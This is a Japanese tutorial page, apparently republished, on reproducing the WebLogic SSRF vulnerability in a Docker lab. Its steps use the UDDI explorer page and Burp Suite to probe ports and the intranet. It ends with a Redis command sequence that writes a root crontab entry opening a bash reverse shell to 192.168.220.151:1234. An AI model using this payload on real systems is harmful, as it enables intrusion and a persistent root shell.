ホームページ > 運用・保守 > 安全性 > Weblogic SSRF の脆弱性を再現する方法

Weblogic SSRF の脆弱性を再現する方法

王林
リリース: 2023-05-14 20:04:04
転載
1416 人が閲覧しました

1. docker を使用して環境を構築する

Docker のインストールと環境構築のチュートリアル: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

#アクセス ポート 7001如何实现Weblogic SSRF漏洞复现

2. 脆弱性の再現手順

1. 脆弱性ページ/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. IBM を確認します。

如何实现Weblogic SSRF漏洞复现

接続があることが判明したため、ssrf がある可能性があります。

3. burp suite を使用してキャプチャします

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

#4. オペレータ パラメータの接続を変更します

如何实现Weblogic SSRF漏洞复现## 5. アクセス結果

#存在しないポートにアクセスすると、HTTP 経由で接続できませんでした。

#既存のポートにアクセスすると、ステータス コードが返されます如何实现Weblogic SSRF漏洞复现

イントラネットにアクセスする如何实现Weblogic SSRF漏洞复现

redis を使用してシェル ペイロードをリバウンドする如何实现Weblogic SSRF漏洞复现

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
ログイン後にコピー

以上がWeblogic SSRF の脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート